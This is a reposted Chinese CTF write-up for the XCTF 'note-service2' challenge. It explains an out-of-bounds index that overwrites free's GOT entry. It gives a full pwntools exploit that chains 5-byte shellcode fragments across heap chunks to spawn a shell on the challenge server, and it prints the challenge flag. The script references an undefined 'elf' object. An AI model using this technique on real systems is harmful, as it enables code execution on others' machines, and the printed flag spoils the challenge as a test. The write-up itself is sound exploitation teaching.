XCTF note-service2

其他 2020-03-11 10:20:08 阅读次数: 0

查程序保护机制
在这里插入图片描述
开启了PIE和CANARRY
没有开启NX,堆栈具有可执行权限

IDA64载入程序,查看main函数
在这里插入图片描述
重点分析sub_E30();
在这里插入图片描述
经过分析得知sub_C56()是一个输出提示信息的函数,sub_B91()是获取用户输入值的函数
sub_DC1();sub_DD4();这两个函数的功能未完成
仅实现了sub_CA5();sub_DE7();这两个函数,这两个函数实现了添加和删除的功能
先分析sub_CA5()
在这里插入图片描述
通过分析得知v1是用户可控的,v1又是qword_2020A0这个数组的下标,所以这里存在数组下标越界漏洞,那么就造成我们可以把任意地址的8个字节覆写为我们申请的堆地址指针,通过数组下标越界我们可以修改got表里的内容为堆指针,程序未开启NX,所以我们可以在堆上布置shellcode;但是这里malloc的参数最高为8个字节,实际上根据我们仅可以写入7个字节
在这里插入图片描述
然而没有7个字节的shellcode,所以我们要对shellcode进行分割,存储在多个堆中,每个堆最后用两个字节(jmp short 0x000)跳转到下一段shellcode
Jmp short xxxx指令占用2字节,这条指令使用的是相对当前指令的下一条指令位置寻址的
我们创建堆是按照顺序来创建的,中间没有删除堆的操作,并且统一申请8字节的空间。
但是实际上根据64位系统堆的数据结构,至少有prev_size、size、fd、bk的空间,实际上的大小为8字节对齐到32字节。使用中的堆块的fd和bk被当成数据区,因此我们的数据是从fd这里开始的,但是因为程序的限制我们只能使用fd的8个字节(实际上我们可控的只有7个字节),导致后面的bk为0x8个字节的空数据。
在这里插入图片描述
每个chunk只有5个字节可以用来构造shellcode
上图中的0x19是通过(0x1 + 0x8 + 0x8 + 0x8)计算得到的
构造shellcode

;64位系统调用
mov rdi,xxxx;"/bin/sh"的地址
mov rax,0x3b;execve系统调用号
mov rsi,0
mov rdx,0
sycall

exp

#coding:utf8
from pwn import *
context.update(arch = 'amd64')
#cyberpeace{7671a4843dece62455ac8c90814e0205}
p = remote('111.198.29.45',40984)
#context.log_level = 'debug'

def add(index,content):
    p.recvuntil('your choice>>')
    p.sendline('1')
    p.recvuntil('index')
    p.sendline(str(index))
    p.recvuntil('size')
    p.sendline(str(8))    
    p.recvuntil('content')
    p.send(content)

def delete(index):
	p.recvuntil('your choice>>')
	p.sendline('4')
	p.recvuntil('index:')
	p.sendline(str(index))

"""
;64位系统调用
mov rdi,xxxx;"/bin/sh"的地址
mov rax,0x3b;execve系统调用号
mov rsi,0
mov rdx,0
sycall
"""
add(0,'/bin/sh')# 向第一个chunk中写入/bin/sh
add((elf.got['free']-0x2020A0)/8,asm('xor rsi,rsi')+'\x90\x90\xeb\x19')
#把got表中free函数的指针覆盖为第二个chunk的指针
#然后在第二个chunk中写入
#xor rsi,rsi
#nop
#nop
#jmp 0x19
add(1,asm('push 0x3b\n pop rax')+'\x90\x90\xeb\x19')
#mov rax,0x3b的机器码站7个字节,而push 0x3b;pop rax只占3个字节
#push 0x3b
#pop rax
#nop
#nop
#jmp 0x19
add(2,asm('xor rdx,rdx')+'\x90\x90\xeb\x19')
#
add(3,asm('syscall')+'\x90'*5)

delete(0)
#因为got表的free函数的地址被修改为我们第二个chunk的地址了,
#所以我们调用free的时候就跳转到了我们第二个chunk的数据段,
#因为这是一个64位程序的函数调用,所以程序会把我们第一个chunk的数据区的指针放入RDI;
#在64位的程序中,当参数少于7个时,参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。

p.interactive()
夏了茶糜
发布了9 篇原创文章 · 获赞 3 · 访问量 237
私信 关注

猜你喜欢

转载自blog.csdn.net/qin9800/article/details/104752438
今日推荐
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
周排行
BPM为企业带来的实际利益
好程序员web前端分享css常用属性缩写
Java文件下载(excel)
css样式的动态添加及显示和隐藏等零碎用法
axios全局配置以及拦截器
使用Logstash来实时同步MySQL和log日志数据到ES
C++获取当前时间(年月日、时分秒、毫秒)
Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)
Java环境配置正确,但是java、javac、java -version均返回“不是内部或外部命令,也不是可运行的程序或批处理文件”?
01 官网下载各种CentOS教程(超详细版)
每日归档
更多
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022